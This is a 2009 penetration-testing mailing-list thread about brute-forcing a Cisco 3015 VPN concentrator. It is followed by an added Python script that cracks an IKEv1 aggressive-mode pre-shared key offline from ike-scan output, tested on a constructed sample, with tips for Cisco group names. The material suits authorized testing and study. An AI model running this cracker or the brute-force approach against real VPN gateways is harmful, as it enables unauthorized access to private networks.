From: Richard Miles (richard.k.miles@googlemail.com)
Date: Fri Mar 13 2009 - 14:05:28 CDT
Hi Alex,
Yes, I know the group name (well, I guess I know, since most companies
intend to use their own company name as the group name).
What do you mean by "ike-scan is the right way to approach it"? Can you
give me an example?
Thanks.
On Fri, Mar 13, 2009 at 3:08 PM, Alex Eden <Alex.Eden@senet-int.com> wrote:
> Do you have the group password?
>
> Well, that's your first objective - to get the group password. Without the
> group password the rest is meaningless. I assume you know the group name,
> right? Ike-scan is the right way to approach it.
>
>
> -----Original Message-----
> From: listbounce@securityfocus.com [mailto:listbounce@securityfocus.com] On
> Behalf Of Richard Miles
> Sent: Tuesday, March 10, 2009 11:54 AM
> To: aditya mukadam; derek.chamorro@gmail.com; David.Howe@ansgroup.co.uk
> Cc: pen-test@securityfocus.com
> Subject: Re: Cisco 3015 concentrator VPN bruteforce? And proxy with easy
> header rewrite?
>
> Hi Aditya, Derek and David,
>
> Thanks for all your replies.
>
> Aditya, well, in the end, what I really need is a tool able to
> brute-force user/password on this uncommon Cisco VPN concentrator.
> Does someone know a tool for that?
>
> I'm thinking of looking for a Linux client and writing an ugly shell script to
> connect and do a brute force; however, it will be very slow. So if
> there is a reliable solution, it would be much better. Also, I'm not
> sure if this Cisco VPN locks accounts by default. Does anyone have more
> experience?
>
> I did find an old message where some guys pointed out a flaw that made it
> possible to enumerate usernames from this Cisco VPN, but it for sure
> was not encapsulated like mine. No results for me, and also, it had
> been patched in the last 3 years.
>
> Derek, thanks for the link; however, the target does not have the web
> interface, and also I'm not allowed to do any DoS attack.
>
> David, yes, I'm sure it's TCP.
>
> Thank you all.
>
> On Tue, Mar 10, 2009 at 6:57 AM, aditya mukadam
> <aditya.mukadam@gmail.com> wrote:
>> Richard,
>>
>> Based on my personal experience with Cisco Concentrator, the result
>> you received is pretty much expected.
>>
>> Quick Question: What are you exactly trying to achieve ? Brute force
>> to get what/which info ?
>>
>> As you would know, Security Associations(SA) are created by the VPN
>> Gateway during IPSec negotiation/connection. The Phase 1 SA is ISAKMP
>> while the Phase 2 SAs are IPSEC (bi-directional). The actual traffic
>> is encrypted with protocol ESP or encapsulated with AH ( not used
>> nowadays). Packet is encapsulated in TCP 10000 after the IPSec
>> connection successfully establishes.
>>
>> Insight into the Cisco Concentrator. It's capable of:
>> 1) Site-to-site IPsec VPN
>> 2) Remote Access IPsec VPN Gateway
>> 3) WebVPN (SSL VPN)
>> Let me know if you need more info.
>>
>> Hope this helps.
>>
>> Thanks,
>> Aditya Govind Mukadam
>>
>>
>>
>> On Tue, Mar 10, 2009 at 3:00 AM, Richard Miles
>> <richard.k.miles@googlemail.com> wrote:
>>> Hello
>>>
>>> I'm doing a pen-test on a Cisco 3015 concentrator - IPsec connections
>>> tunneled over TCP port 10000.
>>>
>>> By the way, ike-scan does not work with this VPN. Also, the common
>>> brute-force tools like THC-pptp, THC-Hydra and Medusa do not work either.
>>>
>>> Nmap doesn't recognize the port as open either (but it doesn't matter); it
>>> says filtered, but I can telnet and establish a connection to it.
>>>
>>> Do you have some experience with this device? Can you give me some
>>> hints? And point me to some tools to identify, enumerate and
>>> brute-force this Cisco implementation?
>>>
>>> A bit off-topic: does anyone know an easy-to-install-and-configure web
>>> proxy for Windows which enables header rewriting? I need to set up a fast
>>> web proxy on my Windows box to replace all headers (before they are
>>> sent to the webserver) of the "Cookie" field and a proprietary header.
>>>
>>> Thanks folks.
>>>
>>>
>>>
>>
>
>
>
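The step Alex alludes to ("ike-scan is the right way" to get the group password) is the classic IKEv1 aggressive-mode attack: the responder's HASH_R is keyed only by the pre-shared key and values visible on the wire, so once ike-scan has recorded an aggressive-mode exchange (its --pskcrack / -P output) the group PSK can be guessed offline. The script below is an added example written for this page, not code from the thread or from ike-scan; it reimplements the RFC 2409 HASH_R computation and cracks it against a wordlist. Assumptions, marked in the code: the nine-field colon-separated hex record layout is the one I believe ike-scan writes (g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni_b, nr_b, hash_r; check it against your ike-scan version), and the sample record is constructed locally with dummy DH values, cookies and nonces so it runs offline; nothing in it was captured from a real device.

```python
import hashlib
import hmac

# Assumed field order of one line of ike-scan --pskcrack output (verify
# against your ike-scan version). All "_b" values are raw payload bodies,
# i.e. without the generic ISAKMP payload header.
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i",
          "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")

# Phase 1 hash algorithms this example understands; the length of HASH_R
# tells them apart (MD5 = 16 bytes, SHA-1 = 20 bytes).
ALG_BY_DIGEST_LEN = {16: "md5", 20: "sha1"}


def prf(alg, key, data):
    """IKEv1 prf: HMAC with the negotiated hash (RFC 2409 section 3.2)."""
    return hmac.new(key, data, getattr(hashlib, alg)).digest()


def parse_pskcrack_line(line):
    """Split a colon-separated hex record into a dict of byte strings."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError("expected %d fields, got %d" % (len(FIELDS), len(parts)))
    return dict(zip(FIELDS, (bytes.fromhex(p) for p in parts)))


def hash_r_for_psk(rec, psk, alg):
    """Recompute HASH_R for a candidate PSK (RFC 2409, aggressive mode):
         SKEYID = prf(PSK, Ni_b | Nr_b)
         HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    Only the PSK is secret; everything else was sent in the clear."""
    skeyid = prf(alg, psk, rec["ni_b"] + rec["nr_b"])
    return prf(alg, skeyid,
               rec["g_xr"] + rec["g_xi"] + rec["cky_r"] + rec["cky_i"]
               + rec["sai_b"] + rec["idir_b"])


def crack_psk(line, candidates):
    """Return the first candidate whose HASH_R matches the record, else None."""
    rec = parse_pskcrack_line(line)
    alg = ALG_BY_DIGEST_LEN.get(len(rec["hash_r"]))
    if alg is None:
        raise ValueError("unsupported HASH_R length %d" % len(rec["hash_r"]))
    for cand in candidates:
        if hmac.compare_digest(hash_r_for_psk(rec, cand.encode(), alg), rec["hash_r"]):
            return cand
    return None


def make_constructed_line(psk, alg="sha1"):
    """CONSTRUCTED sample record, not captured from any device: dummy DH
    values, cookies, SA body, responder ID and nonces, with HASH_R derived
    from `psk` by the formula above so the cracker has a verifiable target."""
    rec = {
        "g_xr": bytes(range(1, 129)),          # fake 1024-bit DH public values
        "g_xi": bytes(range(128, 0, -1)),
        "cky_r": bytes.fromhex("0102030405060708"),
        "cky_i": bytes.fromhex("1112131415161718"),
        "sai_b": bytes.fromhex("00000001000000010000002801010001"),  # dummy SA body
        "idir_b": bytes.fromhex("011101f4c0000201"),  # ID_IPV4_ADDR, udp/500, 192.0.2.1
        "ni_b": bytes.fromhex("a0a1a2a3a4a5a6a7a8a9aaabacadaeaf"),
        "nr_b": bytes.fromhex("b0b1b2b3b4b5b6b7b8b9babbbcbdbebf"),
    }
    rec["hash_r"] = hash_r_for_psk(rec, psk.encode(), alg)
    return ":".join(rec[f].hex() for f in FIELDS)


if __name__ == "__main__":
    # Constructed wordlist; in practice feed a real dictionary.
    wordlist = ["cisco", "admin", "vpngroup", "secret"]
    sample = make_constructed_line("vpngroup")
    print("recovered PSK:", crack_psk(sample, wordlist))
```

Two points worth keeping in mind when applying this to a Cisco remote-access setup like the one in the thread: the group name is what ike-scan's --id sends as the initiator ID, and on Cisco gateways it selects which group's PSK the responder uses; it does not itself appear in HASH_R (IDir_b is the responder's identity), so a wrong group name gives you either no aggressive-mode reply or a hash you can never crack. And the whole approach depends on getting an IKE exchange to the responder in the first place, which is exactly the obstacle Richard describes with the TCP/10000 encapsulation; the offline step above is the same regardless of how the packets were transported.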